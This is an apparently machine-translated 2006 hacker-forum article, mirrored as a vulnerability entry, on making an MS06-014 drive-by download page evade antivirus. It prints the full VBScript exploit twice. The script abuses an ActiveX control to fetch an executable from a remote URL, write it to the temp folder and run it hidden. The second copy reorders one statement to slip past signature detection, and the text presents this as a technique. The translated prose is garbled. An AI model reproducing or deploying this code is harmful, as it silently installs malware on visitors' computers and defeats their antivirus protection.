To ms06014 talk about net horse free kill method-vulnerability warning-the black bar safety net

2006-07-31T00:00:00
ID MYHACK58:62200610805
Type myhack58
Reporter 佚名
Modified 2006-07-31T00:00:00

Description

Net horsefree killmethods are generally two ways,one is the encryption(Microsoft's own encode, or write your own encryption and decryption function better),another is to find the feature code(character or order). A friend said mesh mA is Ka bar kill,do not know the measures,now I ms06014, for example,to pass tips on. The original code:


<html> <script language="VBScript"> on error resume next dl = "<http://www.baidu.com/go.exe>" Set df = document. createElement("object") df. setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" str="Microsoft. XMLHTTP" Set x = df. CreateObject(str,"") a1="Ado" a2="db." a3="Str" a4="eam" str1=a1&a2&a3&a4 str5=str1 set S = df. createobject(str5,"") S. type = 1 str6="GET" x. Open str6, dl, False x. Send fname1="g0ld.com" set F = df. createobject("Scripting. FileSystemObject","") set tmp = F. GetSpecialFolder(2) fname1= F. BuildPath(tmp,fname1) S. open S. write x. responseBody S. savetofile fname1,2 S. close set Q = df. createobject("Shell. Application","") Q. ShellExecute fname1,"","","open",0 </script> <head> <title>Oh,my god!& lt;/title> </head><body> <center>You DO it!& lt;/center> </body></html>

Free to kill:



<html> <script language="VBScript"> on error resume next dl = "<http://www.baidu.com/go.exe>" Set df = document. createElement("object") df. setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" str="Microsoft. XMLHTTP" Set x = df. CreateObject(str,"") a1="Ado" a2="db." a3="Str" a4="eam" str1=a1&a2&a3&a4 str5=str1 set S = df. createobject(str5,"") S. type = 1 str6="GET" x. Open str6, dl, False x. Send fname1="g0ld.com" set F = df. createobject("Scripting. FileSystemObject","") set tmp = F. GetSpecialFolder(2) S. open fname1= F. BuildPath(tmp,fname1)

S. write x. responseBody S. savetofile fname1,2 S. close set Q = df. createobject("Shell. Application","") Q. ShellExecute fname1,"","","open",0 </script> <head> <title>Oh,my god!& lt;/title> </head><body> <center>You DO it!& lt;/center> </body></html>

We observe,in fact, I was the S. the open statement is moved to fname1= F. BuildPath(tmp,fname1)statement before the realization of thefree to kill,this is exactly what frustrated the cascade bar of the file stream feature code detection techniques. Of course,in the mobile statement,it is necessary to note the statement in the Code of the function,otherwise an error occurs.